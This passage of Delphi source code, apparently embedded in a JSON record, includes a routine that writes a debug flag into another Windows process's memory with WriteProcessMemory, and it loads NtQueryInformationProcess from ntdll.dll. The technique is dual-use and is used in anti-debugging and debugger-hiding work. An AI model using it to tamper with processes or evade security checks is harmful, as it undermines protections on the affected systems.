  ///\r\n    result := (ABytesRead = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Update target process debug flag.\r\n\r\n    ADebugStatus = True  : Set target process debug flag.\r\n    ADebugStatus = False : Unset target process debug flag.\r\n-------------------------------------------------------------------------------}\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    ADebugFlag       : Byte;\r\n    ABytesWritten    : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    if ADebugStatus then\r\n        ADebugFlag := 1\r\n    else\r\n        ADebugFlag := 0;\r\n\r\n    if NOT WriteProcessMemory(hProcess, pDebugFlagOffset, @ADebugFlag, SizeOf(Byte), ABytesWritten) then\r\n        Exit;\r\n\r\n    ///\r\n    result := (ABytesWritten = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\ninitialization\r\n    {\r\n    Load NtQueryInformationProcess from NTDLL.dll\r\n    }\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    hNTDLL := LoadLibrary('ntdll.dll');\r\n\r\n    if (hNTDLL <> 0) then\r\n    @_NtQueryInformationProcess := GetProcAddress(hNTDLL, 'NtQueryInformationProcess');\r\n\r\nfinalization\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    if (hNTDLL <> 0) then\r\n    FreeLibrary(hNTDLL);\r\n\r\n\r\nend."
        }
    ]
}